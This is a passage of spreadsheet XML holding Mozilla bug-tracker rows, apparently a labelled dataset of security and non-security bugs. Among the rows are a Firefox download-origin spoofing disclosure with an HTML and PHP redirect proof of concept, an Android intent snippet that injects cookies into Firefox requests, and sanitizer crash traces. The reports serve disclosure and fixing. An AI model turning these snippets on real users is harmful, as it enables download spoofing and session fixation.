        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3034" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S3034" t="inlineStr">
        <is>
          <t>81 Branch</t>
        </is>
      </c>
      <c r="T3034" t="n">
        <v>1</v>
      </c>
      <c r="U3034" t="n">
        <v>0</v>
      </c>
      <c r="V3034" t="n">
        <v>39</v>
      </c>
      <c r="W3034" t="inlineStr">
        <is>
          <t>University of Birmingham Vulnerability Report - Firefox Browser - Download Site Obscured from User
About this Document
-------------------
This document details a vulnerability identified by the University of Birmingham in the Firefox Web Browser.
University of Birmingham Contact Information
--------------------------------------------
The researchers, Richard Thomas and Tom Chothia can be contacted at {r.j.thomas,t.p.chothia}@cs.bham.ac.uk. Please contact us for our PGP key.
Crediting the University of Birmingham
--------------------------------------
The University of Birmingham would appreciate credit to the researchers and the University for any advisories which you may publish about this issue.
Please inform the researchers via their contact email addresses should you:
- confirm that this is a security issue
- allocate the issue a CVE identifier
- determine a date to release a patch
- determine a date to publish advisories
University of Birmingham Disclosure Policy
------------------------------------------
The University of Birmingham follows a responsible, coordinated disclosure approach with affected parties. We do not publicly disclose vulnerabilities without consulting the vendor.
The University of Birmingham recognises that vendors need a reasonable amount of time to mitigate a vulnerability, understand the impact to customers, triage other vulnerability reports and implement resolutions in coordination with others and its customers. The researchers are happy to discuss how such disclosures may take place.
If the researchers believe a vendor is not making appropriate progress with the resolution of this vulnerability, we may, following discussion with the vendor, choose to share details with the UK National Cyber Security Centre to protect UK interests.
Summary
-------
A User Interface (UI) Misrepresentation of Critical Information issue exists on the Download UI process on the Firefox browser, and has been tested on Firefox 76.0.1 for Windows, MacOS and Linux (Kali Repositories). This can be exploited by an adversary exploiting an Open Redirect (CWE-601) on a trusted device to display the source of the download in the Download List UI as the trusted device, and not the true download site. 
If a user is tricked into downloading and running a malicious file by making the trusted host appear in the downloads list, they will be more likely to run the malware.
These vulnerabilities have a Severity Score of 7.1 and a High Severity rating (based on the Common Vulnerability Scoring System v3.1).
CVSS
----
This vulnerability has a Severity Score of 7.1 and a High Severity rating (the CVSS Vector is AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L).
The Common Weakness Enumeration ID is CWE-451: User Interface (UI) Misrepresentation of Critical Information.
Details
-------
The Firefox browser is one of a number of cross-platform browsers which commonly used by end-users. Where an Open Redirect vulnerability (CWE-601) exists on a device that is trusted by the user, the response to a user request may redirect the user to untrusted content which was not initially requested. In Firefox, given an Open Redirect using the HTTP POST method, upon receipt of the HTTP 302 Redirect from the trusted device, the browser may start a download of a malicious file from the adversary. Where Firefox displays a dialog box for the user to select whether to Open or Save the file, the adversary host is displayed as the source, however, upon completion of the download, the Download UI on Firefox displays the trusted device as the source of the download in the list. Where the user has previously configured Firefox to automatically save files of a particular type, the user would see the trusted device as the download host, not the adversary's host.
On MacOS, if the user attempts to execute an installer downloaded via the Open Redirect, MacOS Gatekeeper will confirm that Firefox downloaded the file from the trusted device, and not the true download site.
This issue has been tested on Firefox 76.0.1. on Windows 10 Enterprise N (Version 1709), MacOS 10.15 Catalina and Kali Linux 2019.4. 
Steps to reproduce:
- Submit a HTTP POST request to a trusted device, which will issue a HTTP 302 Redirect to another site, hosting a download.
- If a download prompt is displayed, the site should be shown as the one indicated in the 302 Redirect. Click Save.
- Once the download has completed, click the Download UI Button, and the file should show there. No host is displayed. Click 'Show All Downloads' and the downloaded file will show in the list with the host shown as the trusted device, not the true download site.
PoC code is given at the bottom of this report.
Mitigation
----------
Firefox should display the name of the host that the file was downloaded from in teh download list (i.e. the host stated in the download dialog), not the name of the host that issued the redirect.
Note
----
This issue was identified during the assessment of an Open Redirect Vulnerability using POST, which is undergoing responsible disclosure with the Vendor. 
A minimal example demonstrating this behaviour is given below:
1. Trusted Page simulating Open Redirect form behaviour (test.html)
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;body&gt;
&lt;form action="index.php" method="POST"&gt;
  &lt;input type="submit" value="Submit"&gt;
&lt;/form&gt; 
&lt;p&gt;If you click the "Submit" button, the form-data will be sent to a page called "/index.php".&lt;/p&gt;
&lt;/body&gt;
&lt;/html&gt;
2. PHP (on server) to trigger the download and force this behaviour
&lt;?php
Header("HTTP/1.1 302 Object Moved" );
Header("Content-Type: text/html; charset=UTF-8");
Header("Cache-Control: no-cache");
Header("Pragma: no-cache");
Header("Expires: 0");
Header("Location: //&lt;Download Page&gt;");
Header("Content-Length: 0");
Header("Connection: close");
exit();
?&gt;</t>
        </is>
      </c>
      <c r="X3034" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3035">
      <c r="A3035" t="n">
        <v>1243816</v>
      </c>
      <c r="B3035" t="inlineStr">
        <is>
          <t>2016-01-28 10:05:34 -0800</t>
        </is>
      </c>
      <c r="C3035" t="inlineStr">
        <is>
          <t>graphite2: heap-buffer-overflow write in [@graphite2::vm::Machine::Code::Code]</t>
        </is>
      </c>
      <c r="D3035" t="inlineStr">
        <is>
          <t>2016-09-22 14:47:25 -0700</t>
        </is>
      </c>
      <c r="E3035" t="n">
        <v>1</v>
      </c>
      <c r="F3035" t="n">
        <v>1</v>
      </c>
      <c r="G3035" t="n">
        <v>3</v>
      </c>
      <c r="H3035" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3035" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3035" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K3035" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3035" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3035" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3035" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3035" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3035" t="inlineStr">
        <is>
          <t>[adv-main45+][adv-esr38.7+]</t>
        </is>
      </c>
      <c r="Q3035" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3035" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3035" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3035" t="n">
        <v>1</v>
      </c>
      <c r="U3035" t="n">
        <v>0</v>
      </c>
      <c r="V3035" t="n">
        <v>16</v>
      </c>
      <c r="W3035" t="inlineStr">
        <is>
          <t>This was found while fuzzing graphite2 1.3.5 (and is in 1.3.4)
This is likely sec-critical.</t>
        </is>
      </c>
      <c r="X3035" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3036">
      <c r="A3036" t="n">
        <v>723465</v>
      </c>
      <c r="B3036" t="inlineStr">
        <is>
          <t>2012-02-02 04:23:53 -0800</t>
        </is>
      </c>
      <c r="C3036" t="inlineStr">
        <is>
          <t>Investigate if ListBase&lt;LC&gt;::finalize should use deferred release</t>
        </is>
      </c>
      <c r="D3036" t="inlineStr">
        <is>
          <t>2012-07-12 08:51:57 -0700</t>
        </is>
      </c>
      <c r="E3036" t="n">
        <v>1</v>
      </c>
      <c r="F3036" t="n">
        <v>1</v>
      </c>
      <c r="G3036" t="n">
        <v>3</v>
      </c>
      <c r="H3036" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3036" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3036" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K3036" t="inlineStr">
        <is>
          <t>12 Branch</t>
        </is>
      </c>
      <c r="L3036" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3036" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3036" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3036" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3036" t="inlineStr">
        <is>
          <t>[sg:critical][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q3036" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3036" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3036" t="inlineStr">
        <is>
          <t>mozilla15</t>
        </is>
      </c>
      <c r="T3036" t="n">
        <v>1</v>
      </c>
      <c r="U3036" t="n">
        <v>0</v>
      </c>
      <c r="V3036" t="n">
        <v>18</v>
      </c>
      <c r="W3036" t="inlineStr">
        <is>
          <t>I was trying to understand how new nodelist bindings work and noticed that
release may happen in ::finalize. Is it possible that it may cause similar problems
as what bug 712448 caused?</t>
        </is>
      </c>
      <c r="X3036" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3037">
      <c r="A3037" t="n">
        <v>1299499</v>
      </c>
      <c r="B3037" t="inlineStr">
        <is>
          <t>2016-08-31 08:29:05 -0700</t>
        </is>
      </c>
      <c r="C3037" t="inlineStr">
        <is>
          <t>Firefox becomes unresponsive if accessing  non-remote pages while the RDM is enabled</t>
        </is>
      </c>
      <c r="D3037" t="inlineStr">
        <is>
          <t>2018-06-13 10:32:46 -0700</t>
        </is>
      </c>
      <c r="E3037" t="n">
        <v>1</v>
      </c>
      <c r="F3037" t="n">
        <v>1</v>
      </c>
      <c r="G3037" t="n">
        <v>3</v>
      </c>
      <c r="H3037" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3037" t="inlineStr">
        <is>
          <t>DevTools</t>
        </is>
      </c>
      <c r="J3037" t="inlineStr">
        <is>
          <t>Responsive Design Mode</t>
        </is>
      </c>
      <c r="K3037" t="inlineStr">
        <is>
          <t>51 Branch</t>
        </is>
      </c>
      <c r="L3037" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3037" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3037" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3037" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3037" t="inlineStr">
        <is>
          <t>[multiviewport] [reserve-rdm]</t>
        </is>
      </c>
      <c r="Q3037" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3037" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3037" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3037" t="n">
        <v>1</v>
      </c>
      <c r="U3037" t="n">
        <v>0</v>
      </c>
      <c r="V3037" t="n">
        <v>6</v>
      </c>
      <c r="W3037" t="inlineStr">
        <is>
          <t>[Affected versions]:
- Firefox 51.0a1 (2016-08-31)
[Affected platforms]:
- Windows 10x64, Mac OS X 10.10.5, Ubuntu 16.04x64
[Steps to reproduce]:
1. Launch Firefox.
2. From about:config, enable the devtools.responsive.html.enabled pref.
3. Enable RDM.
4. Open non-remote(Eg. about:config) page the opened tab.
5. Select another tab.
6. Click on the previous tab.
[Expected result]:
- Firefox works correctly.
[Actual result]:
- Firefox becomes unresponsive and in the Browser Console, the Error: Assertion failuretabbrowser.xml:3545:23 is thrown.
[Regression range]:
- I will search for regression ASAP.
[Additional notes]:
- Also, after performing step 4 from STR, the RDM tool is displayed as being enabled in the Developer menu.</t>
        </is>
      </c>
      <c r="X3037" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3038">
      <c r="A3038" t="n">
        <v>656332</v>
      </c>
      <c r="B3038" t="inlineStr">
        <is>
          <t>2011-05-11 09:39:34 -0700</t>
        </is>
      </c>
      <c r="C3038" t="inlineStr">
        <is>
          <t>No crash reports from Fennec 4.0.1 since 2011-05-01</t>
        </is>
      </c>
      <c r="D3038" t="inlineStr">
        <is>
          <t>2011-12-30 11:25:25 -0800</t>
        </is>
      </c>
      <c r="E3038" t="n">
        <v>1</v>
      </c>
      <c r="F3038" t="n">
        <v>1</v>
      </c>
      <c r="G3038" t="n">
        <v>4</v>
      </c>
      <c r="H3038" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3038" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J3038" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3038" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3038" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M3038" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N3038" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3038" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3038" t="inlineStr"/>
      <c r="Q3038" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3038" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3038" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3038" t="n">
        <v>0</v>
      </c>
      <c r="U3038" t="n">
        <v>0</v>
      </c>
      <c r="V3038" t="n">
        <v>9</v>
      </c>
      <c r="W3038" t="inlineStr">
        <is>
          <t>crash-stats.mozilla.com does not find any crashes for Fennec 4.0.1 after about 2011-04-29 at 15:00.  For example:
https://crash-stats.mozilla.com/query/query?product=Fennec&amp;version=Fennec%3A4.0.1&amp;range_value=11&amp;range_unit=days&amp;date=05%2F10%2F2011+15%3A00%3A00&amp;query_search=signature&amp;query_type=contains&amp;query=&amp;reason=&amp;build_id=&amp;process_type=any&amp;hang_type=any&amp;do_query=1</t>
        </is>
      </c>
      <c r="X3038" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3039">
      <c r="A3039" t="n">
        <v>1661071</v>
      </c>
      <c r="B3039" t="inlineStr">
        <is>
          <t>2020-08-25 09:41:48 -0700</t>
        </is>
      </c>
      <c r="C3039" t="inlineStr">
        <is>
          <t>Missing restricted header check in Browser.EXTRA_HEADERS</t>
        </is>
      </c>
      <c r="D3039" t="inlineStr">
        <is>
          <t>2024-05-30 10:18:19 -0700</t>
        </is>
      </c>
      <c r="E3039" t="n">
        <v>1</v>
      </c>
      <c r="F3039" t="n">
        <v>1</v>
      </c>
      <c r="G3039" t="n">
        <v>2</v>
      </c>
      <c r="H3039" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3039" t="inlineStr">
        <is>
          <t>Fenix</t>
        </is>
      </c>
      <c r="J3039" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3039" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3039" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3039" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N3039" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3039" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3039" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][geckoview:m83][adv-main84+]</t>
        </is>
      </c>
      <c r="Q3039" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3039" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S3039" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3039" t="n">
        <v>1</v>
      </c>
      <c r="U3039" t="n">
        <v>0</v>
      </c>
      <c r="V3039" t="n">
        <v>19</v>
      </c>
      <c r="W3039" t="inlineStr">
        <is>
          <t>Created attachment 9171952
poc.apk
## Summary
Missing restrictions in the way Mozilla Firefox for Android deals with headers from `Browser.EXTRA_HEADERS` allow a malicious application to inject sensitive headers in a request such as cookies, leading to session-fixation.
## Environment
- **Device:** HTC m8
- **OS version:** Android 9
- **Package name:** org.mozilla.firefox
- **App version:** 79.0.5 (`versionCode` 2015758619)
---
## Proof of concept
### Pre-conditions:
- PoC installed
- Python3 installed
- Mozilla Firefox installed
- ngrok (optional for easy tunneling)
### Steps:
1. Start the `server.py` (see attachments) using the following command:
```
$ python3 server.py
```
2. Start PoC app in the device
3. Type the URL of the server (step 1) in the `EditText` of the application
4. Tap "Start"
### Result
A webpage opens in Firefox containing the Headers of the request. `Cookie` header can be seen there.
### Expected result
Restricted headers should not be allowed to be set.
---
## Detailed explanation
When the user taps in `Start` in the malicious app, the following intent is fired:
```kotlin
val intent = Intent(Intent.ACTION_VIEW)
intent.putExtra("android.support.customtabs.extra.SESSION", true)
intent.data = Uri.parse(edit.text.toString())
intent.`package` = "org.mozilla.firefox"
val bundle = Bundle()
bundle.putString("Cookie", "cookie_here")
bundle.putString("Sec-Fetch-Site", "same-site")
intent.putExtra(Browser.EXTRA_HEADERS, bundle)
```
This intent accepts a `Bundle` of headers the user wants to inject in the request. However, there are no restrictions to which headers can be set here. 
According to [this list](https://developer.mozilla.org/pt-BR/docs/Glossario/Forbidden_header_name), there are several headers that shouldn't be changed. 
In this attack, these are passed to the server.
The server attached only prints the headers from the request.
---
## Vulnerable code
- [CustomTabIntentProcessor.kt#L37](https://github.com/mozilla-mobile/android-components/blob/07fb81f9c21e8d4f280019fe71a1f2fec0226d68/components/feature/customtabs/src/main/java/mozilla/components/feature/customtabs/CustomTabIntentProcessor.kt?fbclid=IwAR3JZ9yIDbbBdKuUNWmryn8trhijkSSFqlWBtKkyueUCVoJwGWyS-xhFyBA#L37)
  ```
  val pairs = intent.getBundleExtra(Browser.EXTRA_HEADERS)
  ```
---
## Remediation
- These headers should be cross checked with the list of forbidden headers.
---
## Attachments
https://drive.google.com/drive/folders/1WR0oFzcxM568IB5GH-TG_G3k-TZP1x3Y?usp=sharing
- server.py - Python3 HTTP server
- poc.zip - Source code of the PoC
- poc.apk - Compiled Android binary
- video.mp4 - Video showing the exploit in action
---
## Impact
Cookies can be changed, leading to session fixation. 
Other impact of changing the forbidden headers apply.</t>
        </is>
      </c>
      <c r="X3039" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3040">
      <c r="A3040" t="n">
        <v>1824200</v>
      </c>
      <c r="B3040" t="inlineStr">
        <is>
          <t>2023-03-23 10:51:26 -0700</t>
        </is>
      </c>
      <c r="C3040" t="inlineStr">
        <is>
          <t>[tsan] data race initializing the SharedFTFace in gfxFontconfigFontEntry::GetFTFace</t>
        </is>
      </c>
      <c r="D3040" t="inlineStr">
        <is>
          <t>2024-05-30 11:07:22 -0700</t>
        </is>
      </c>
      <c r="E3040" t="n">
        <v>1</v>
      </c>
      <c r="F3040" t="n">
        <v>1</v>
      </c>
      <c r="G3040" t="n">
        <v>3</v>
      </c>
      <c r="H3040" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3040" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3040" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K3040" t="inlineStr">
        <is>
          <t>Firefox 113</t>
        </is>
      </c>
      <c r="L3040" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3040" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3040" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3040" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3040" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main112+]</t>
        </is>
      </c>
      <c r="Q3040" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3040" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S3040" t="inlineStr">
        <is>
          <t>113 Branch</t>
        </is>
      </c>
      <c r="T3040" t="n">
        <v>1</v>
      </c>
      <c r="U3040" t="n">
        <v>0</v>
      </c>
      <c r="V3040" t="n">
        <v>20</v>
      </c>
      <c r="W3040" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1823365 +++
After fixing the originally-reported missing-glyph atlas issue, Tyson is still seeing another, unrelated data race with the same testcase; see bug 1823365 comment 11, and attachment 9324553.
The race here involved the fontconfig backend and its management of the FreeType face:
```
WARNING: ThreadSanitizer: data race (pid=104338)
  Read of size 8 at 0x7b5400001d60 by thread T18:
    #0 RefPtr /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:97:27 (libxul.so+0x5917041) (BuildId: 9ee4bdacd12c56311ad459908123f344c17c0ace)
    #1 gfxFontconfigFontEntry::CreateFontInstance(gfxFontStyle const*) /builds/worker/checkouts/gecko/gfx/thebes/gfxFcPlatformFontList.cpp:859:31 (libxul.so+0x5917041)
    #2 gfxFontEntry::FindOrMakeFont(gfxFontStyle const*, gfxCharacterMap*) /builds/worker/checkouts/gecko/gfx/thebes/gfxFontEntry.cpp:266:22 (libxul.so+0x5947cfe) (BuildId: 9ee4bdacd12c56311ad459908123f344c17c0ace)
```
vs
```
  Previous write of size 8 at 0x7b5400001d60 by thread T20:
    #0 assign_assuming_AddRef /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:71:13 (libxul.so+0x59162e3) (BuildId: 9ee4bdacd12c56311ad459908123f344c17c0ace)
    #1 operator=&lt;mozilla::gfx::SharedFTFace&gt; /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:226:5 (libxul.so+0x59162e3)
    #2 gfxFontconfigFontEntry::GetFTFace() /builds/worker/checkouts/gecko/gfx/thebes/gfxFcPlatformFontList.cpp:941:13 (libxul.so+0x59162e3)
    #3 gfxFontconfigFontEntry::CreateFontInstance(gfxFontStyle const*) /builds/worker/checkouts/gecko/gfx/thebes/gfxFcPlatformFontList.cpp:859:31 (libxul.so+0x5917036) (BuildId: 9ee4bdacd12c56311ad459908123f344c17c0ace)
    #4 gfxFontEntry::FindOrMakeFont(gfxFontStyle const*, gfxCharacterMap*) /builds/worker/checkouts/gecko/gfx/thebes/gfxFontEntry.cpp:266:22 (libxul.so+0x5947cfe) (BuildId: 9ee4bdacd12c56311ad459908123f344c17c0ace)
```
I guess the root of the problem here is that the `mFTFace` and `mFTFaceInitialized` members of `gfxFontconfigFontEntry` are not guarded or atomic, so we have a problem if two threads call GetFTFace() on the same (not-yet-initialized) entry at the same time.</t>
        </is>
      </c>
      <c r="X3040" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3041">
      <c r="A3041" t="n">
        <v>1371889</v>
      </c>
      <c r="B3041" t="inlineStr">
        <is>
          <t>2017-06-09 19:32:27 -0700</t>
        </is>
      </c>
      <c r="C3041" t="inlineStr">
        <is>
          <t>Heap-use-after-free in mozilla::dom::(anonymous namespace)::ConsumeBodyDoneObserver&lt;mozilla::dom::Request&gt;::OnStreamComplete</t>
        </is>
      </c>
      <c r="D3041" t="inlineStr">
        <is>
          <t>2024-05-30 09:34:17 -0700</t>
        </is>
      </c>
      <c r="E3041" t="n">
        <v>1</v>
      </c>
      <c r="F3041" t="n">
        <v>1</v>
      </c>
      <c r="G3041" t="n">
        <v>3</v>
      </c>
      <c r="H3041" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3041" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3041" t="inlineStr">
        <is>
          <t>DOM: Workers</t>
        </is>
      </c>
      <c r="K3041" t="inlineStr">
        <is>
          <t>44 Branch</t>
        </is>
      </c>
      <c r="L3041" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3041" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3041" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3041" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3041" t="inlineStr">
        <is>
          <t>[adv-main56+][adv-esr52.4+]</t>
        </is>
      </c>
      <c r="Q3041" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3041" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3041" t="inlineStr">
        <is>
          <t>mozilla56</t>
        </is>
      </c>
      <c r="T3041" t="n">
        <v>1</v>
      </c>
      <c r="U3041" t="n">
        <v>0</v>
      </c>
      <c r="V3041" t="n">
        <v>58</v>
      </c>
      <c r="W3041" t="inlineStr">
        <is>
          <t>Created attachment 8876357
t.zip
&gt;=================================================================
&gt;==107957==ERROR: AddressSanitizer: heap-use-after-free on address 0x60d000066990 at pc 0x7f6f64bc192f bp 0x7ffcea9dbcf0 sp 0x7ffcea9dbce8
&gt;READ of size 8 at 0x60d000066990 thread T0 (Web Content)
&gt;    #0 0x7f6f64bc192e in mozilla::dom::(anonymous namespace)::ConsumeBodyDoneObserver&lt;mozilla::dom::Request&gt;::OnStreamComplete(nsIStreamLoader*, nsISupports*, nsresult, unsigned int, unsigned char const*) dom/fetch/Fetch.cpp:1006:21
&gt;    #1 0x7f6f613b41e7 in mozilla::net::nsStreamLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) netwerk/base/nsStreamLoader.cpp:105:30
&gt;    #2 0x7f6f6131fc95 in nsInputStreamPump::OnStateStop() netwerk/base/nsInputStreamPump.cpp:734:20
&gt;    #3 0x7f6f6131e44e in nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) netwerk/base/nsInputStreamPump.cpp:448:25
&gt;    #4 0x7f6f611532fd in nsInputStreamReadyEvent::Run() xpcom/io/nsStreamUtils.cpp:96:20
&gt;    #5 0x7f6f6119a898 in mozilla::ThrottledEventQueue::Inner::ExecuteRunnable() xpcom/threads/ThrottledEventQueue.cpp:190:22
&gt;    #6 0x7f6f6119a47f in mozilla::ThrottledEventQueue::Inner::Executor::Run() xpcom/threads/ThrottledEventQueue.cpp:74:15
&gt;    #7 0x7f6f6119a898 in mozilla::ThrottledEventQueue::Inner::ExecuteRunnable() xpcom/threads/ThrottledEventQueue.cpp:190:22
&gt;    #8 0x7f6f6119a47f in mozilla::ThrottledEventQueue::Inner::Executor::Run() xpcom/threads/ThrottledEventQueue.cpp:74:15
&gt;    #9 0x7f6f611827c8 in mozilla::SchedulerGroup::Runnable::Run() xpcom/threads/SchedulerGroup.cpp:359:25
&gt;    #10 0x7f6f611ad373 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:1406:14
&gt;    #11 0x7f6f611b7278 in NS_ProcessNextEvent(nsIThread*, bool) xpcom/threads/nsThreadUtils.cpp:472:10
&gt;    #12 0x7f6f61d66358 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:96:21
&gt;    #13 0x7f6f61ccd9ed in RunHandler ipc/chromium/src/base/message_loop.cc:231:3
&gt;    #14 0x7f6f61ccd9ed in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:211
&gt;    #15 0x7f6f65f1b0fa in nsBaseAppShell::Run() widget/nsBaseAppShell.cpp:156:27
&gt;    #16 0x7f6f693d6aac in XRE_RunAppShell() toolkit/xre/nsEmbedFunctions.cpp:896:22
&gt;    #17 0x7f6f61ccd9ed in RunHandler ipc/chromium/src/base/message_loop.cc:231:3
&gt;    #18 0x7f6f61ccd9ed in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:211
&gt;    #19 0x7f6f693d6598 in XRE_InitChildProcess(int, char**, XREChildData const*) toolkit/xre/nsEmbedFunctions.cpp:712:34
&gt;    #20 0x524fc1 in content_process_main browser/app/../../ipc/contentproc/plugin-container.cpp:64:30
&gt;    #21 0x524fc1 in main browser/app/nsBrowserApp.cpp:286
&gt;    #22 0x7f6f79ee7f44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
&gt;    #23 0x41d905 in _start (objdir-ff-asan/dist/bin/firefox-bin+0x41d905)
&gt;
&gt;0x60d000066990 is located 16 bytes inside of 144-byte region [0x60d000066980,0x60d000066a10)
&gt;freed by thread T104 (DOM Worker) here:
&gt;    #0 0x4e8890 in __interceptor_free /build/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47
&gt;    #1 0x7f6f6108dd75 in SnowWhiteKiller::~SnowWhiteKiller() xpcom/base/nsCycleCollector.cpp:2651:25
&gt;    #2 0x7f6f6108d1f1 in nsCycleCollector::FreeSnowWhite(bool) xpcom/base/nsCycleCollector.cpp:2826:3
&gt;    #3 0x7f6f61093ee8 in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) xpcom/base/nsCycleCollector.cpp:3829:3
&gt;    #4 0x7f6f61093852 in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*, bool) xpcom/base/nsCycleCollector.cpp:3650:9
&gt;    #5 0x7f6f61094f74 in ShutdownCollect xpcom/base/nsCycleCollector.cpp:3591:10
&gt;    #6 0x7f6f61094f74 in nsCycleCollector::Shutdown(bool) xpcom/base/nsCycleCollector.cpp:3886
&gt;    #7 0x7f6f61096b4c in nsCycleCollector_shutdown(bool) xpcom/base/nsCycleCollector.cpp:4247:23
&gt;    #8 0x7f6f65a486cb in (anonymous namespace)::WorkerJSContext::~WorkerJSContext() dom/workers/RuntimeService.cpp:1144:5
&gt;    #9 0x7f6f65a47f3a in (anonymous namespace)::WorkerThreadPrimaryRunnable::Run() dom/workers/RuntimeService.cpp:2952:3
&gt;    #10 0x7f6f611ad373 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:1406:14
